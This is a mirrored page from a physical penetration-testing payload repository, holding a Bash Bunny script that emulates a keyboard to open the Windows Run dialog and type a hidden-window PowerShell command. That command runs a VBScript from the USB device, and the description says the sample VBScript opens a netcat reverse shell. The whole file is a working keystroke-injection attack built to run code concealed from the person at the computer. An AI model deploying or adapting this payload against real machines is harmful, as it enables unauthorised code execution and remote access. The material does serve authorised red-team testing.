mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
938be26260
This payload executes a VBScript as the payload. The sample VBScript creates a netcat reverse shell, but any VBScript can be substituted. netcat.exe must be sourced elsewhere.
35 lines
856 B
Bash
35 lines
856 B
Bash
#!/bin/bash
|
|
#
|
|
# Title: RAZ_VBScript
|
|
# Author: RalphyZ
|
|
# Version: 1.0
|
|
# Target: Windows 7+
|
|
# Dependencies: VBScript (a.vbs) in the switch folder with this file
|
|
#
|
|
# Description: Executes a VBScript, concealed in a hidden PowerShell window
|
|
#
|
|
# Colors:
|
|
# Green.....................Working
|
|
# White.....................Completed without error
|
|
# Light-Blue (blinking).....a.vbs was not found
|
|
|
|
LED G
|
|
ATTACKMODE HID STORAGE
|
|
|
|
# Get the switch position
|
|
source bunny_helpers.sh
|
|
|
|
# Check if a.vbs is present
|
|
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then
|
|
LED B G 100
|
|
exit 1
|
|
fi
|
|
|
|
# Run the VBScript
|
|
QUACK GUI r
|
|
QUACK DELAY 100
|
|
QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs')"
|
|
QUACK ENTER
|
|
|
|
# Green LED for finished
|
|
LED R G B |